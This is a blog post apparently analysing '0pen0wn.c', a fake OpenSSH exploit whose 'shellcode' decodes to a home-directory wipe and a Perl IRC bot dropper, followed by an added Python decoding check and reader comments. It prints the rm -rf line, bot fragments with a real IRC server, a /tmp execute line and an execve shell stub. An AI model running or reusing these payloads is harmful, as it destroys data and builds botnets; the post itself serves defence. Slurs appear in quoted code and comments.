0pen0wn.c - Shellcode "disassembled"


Rumor had it that the anti-sec group was using an OpenSSH 0day; today str0ke linked to a URL that supposedly holds the exploit code for that 0day.

The reason the disassembled shellcode looked like crap is that, well, it isn't shellcode: it is nothing other than plain ASCII shell and Perl commands.

Here is that JMP code converted to "assembly":
00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah

Obviously this code doesn't make any sense whatsoever, so here is the same JMP code converted from hex to ASCII instead:
rm -rf ~ /* 2> /dev/null &
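As an added example (this is not code from the original post or from 0pen0wn.c), here is the check that would have saved the people in the comments: before compiling a supposed exploit, decode its "shellcode" byte array and see whether it is machine code or disguised text. Both sample literals below are constructed for this example: one re-encodes the decoded rm -rf line above as a C string, the other is a generic x86 execve("/bin//sh") stub used as a control. The marker list and the 0.9 printable-ratio threshold are heuristics chosen here, not anything from the post.

```python
"""Triage a C-style "shellcode" literal before you compile and run an exploit.

Added example; not code from the original post or from 0pen0wn.c. The sample
literals are constructed here, and the marker list and TEXT_THRESHOLD are
heuristics chosen for this example.
"""
import re

# Strings that have no business inside real machine-code shellcode.
DANGEROUS_MARKERS = (
    "rm -rf",
    "/dev/null",
    "#!/usr/bin/perl",
    "chmod +x",
    "/tmp/",
)

# Bytes treated as "text": printable ASCII plus tab/newline/CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
TEXT_THRESHOLD = 0.9  # heuristic: above this, the array is text, not code

# Constructed sample: "rm -rf ~ /* 2> /dev/null &" written back as the kind
# of C string literal a shellcode array in 0pen0wn.c-style sources uses.
SAMPLE_TEXT_PAYLOAD = (
    '"\\x72\\x6d\\x20\\x2d\\x72\\x66\\x20\\x7e\\x20\\x2f\\x2a\\x20"\n'
    '"\\x32\\x3e\\x20\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x26"'
)

# Constructed control: 23-byte x86 execve("/bin//sh") stub; genuine code
# scores low on printability even though it embeds "/bin//sh".
SAMPLE_MACHINE_CODE = (
    '"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e"\n'
    '"\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"'
)

_SIMPLE_ESCAPES = {"n": 0x0A, "t": 0x09, "r": 0x0D, "\\": 0x5C, '"': 0x22, "'": 0x27}


def parse_c_literal(literal: str) -> bytes:
    """Decode adjacent C string literals ("..." "...") into raw bytes.

    Handles \\xNN (up to two hex digits, as shellcode arrays are written),
    octal \\NNN and the common single-character escapes; anything else is an
    error rather than a silent guess.
    """
    out = bytearray()
    for chunk in re.findall(r'"((?:[^"\\]|\\.)*)"', literal, re.S):
        i = 0
        while i < len(chunk):
            ch = chunk[i]
            if ch != "\\":
                out.extend(ch.encode("utf-8"))
                i += 1
                continue
            nxt = chunk[i + 1 : i + 2]
            if nxt == "x":
                m = re.match(r"[0-9a-fA-F]{1,2}", chunk[i + 2 :])
                if not m:
                    raise ValueError("bad \\x escape at offset %d" % i)
                out.append(int(m.group(0), 16))
                i += 2 + len(m.group(0))
            elif nxt and nxt in "01234567":
                m = re.match(r"[0-7]{1,3}", chunk[i + 1 :])
                out.append(int(m.group(0), 8) & 0xFF)
                i += 1 + len(m.group(0))
            elif nxt in _SIMPLE_ESCAPES:
                out.append(_SIMPLE_ESCAPES[nxt])
                i += 2
            else:
                raise ValueError("unsupported escape \\%s at offset %d" % (nxt, i))
    return bytes(out)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII text."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def triage(literal: str) -> dict:
    """Decode the literal and report whether it is code or disguised text."""
    data = parse_c_literal(literal)
    ratio = printable_ratio(data)
    text = data.decode("latin-1")
    markers = [m for m in DANGEROUS_MARKERS if m in text]
    is_text = ratio >= TEXT_THRESHOLD or bool(markers)
    return {
        "length": len(data),
        "printable_ratio": ratio,
        "markers": markers,
        "decoded": text if is_text else None,
        "verdict": "plain-text commands, not shellcode" if is_text else "looks like machine code",
    }


if __name__ == "__main__":
    for name, lit in (("0pen0wn-style", SAMPLE_TEXT_PAYLOAD),
                      ("execve stub", SAMPLE_MACHINE_CODE)):
        r = triage(lit)
        print("%-14s %2d bytes, %3.0f%% printable, markers=%s -> %s"
              % (name, r["length"], 100 * r["printable_ratio"], r["markers"], r["verdict"]))
        if r["decoded"] is not None:
            print("  decoded: %r" % r["decoded"])
```

Paste the `"\x.."` array from any exploit you are about to try into `triage()`; a high printable ratio or a hit on one of the markers means you are looking at a shell or Perl payload dressed up as shellcode, and the decoded string tells you exactly what it would do to the machine you run it on.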

The "shellcode" part is actually a Perl script that connects to an IRC server. It only survives on this page as garbled, overlapping fragments; the distinct readable pieces are:
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM} ...
while (<$sock>){if (/^PING (.*)$/){print ...
sleep 1;
... k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ...
... chmod +x /tmp/hi 2>/dev/null;/tmp/hi

The supposedly FreeBSD shellcode decodes to the same plain-text Perl; again only fragments survive on the page:

#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM} ...
while (<$sock>){if (/^PING (.*)$/){print ...
sleep 1;
... k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ...
... }}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi


12 comments:

Anonymous said...

$key ="fags"
Hahahah!!!

Anonymous said...

Hahaha, what happened to your leet disassembly of the perl code from before?

Stefin said...

I was so excited to see the code and ran it on my local Linux PC, and all data was lost. I read this only after doing it :-(

DiabloHorn said...

This was expected to happen eventually. I wonder how many people will still fall for it though.

Anonymous said...

I'm on the euirc staff.
We're investigating the resulting botnet and are about to shut it down ASAP. It would have been nice if we had been notified earlier, however.

jaj+google said...

@Stefin: PEBKAC

Anonymous said...

Not only does the shellcode suck and try to rm -rf your system... If you forget about all that and look at the code further down, a big hint that it's fake is "int port=23"... I mean, I'm no expert, but if it's an OpenSSH exploit, I would assume it would say port 22 for SSH, not 23, which is usually reserved for Telnet.

DiabloHorn, far too many people will fall for it unfortunately.

Anonymous said...

Hmm..
Found this out yesterday.
Actually learned a lot about security and backup strategies at the same time :-/

Anonymous said...

Same as here: http://blogs.securiteam.com/index.php/archives/1302

pbx06 said...

Just wondering, how did you go from opcode values => asm?

Using gdb you can go from bin => opcode values.

pbx06 said...

The strange thing is that all the IPs that try to bruteforce my server are hosts that run OpenSSH 4.3.
However acording to
http://www.h-online.com/security/OpenSSH-zero-day-exploit-rumours-not-confirmed--/news/113731

OpenSSH zero day exploit rumours not confirmed

Is this disinformation spread deliberately by the hacker group? The fact is that proving that your URL isn't an OpenSSH exploit.

Also, many people think that astalavista was exposed by an OpenSSH bug, while a message on a mailing list shows that lightspeed was exploited and then a local privilege escalation.

Anonymous said...

anti-sec fags forgot to put --no-preserve-root in their code. idiots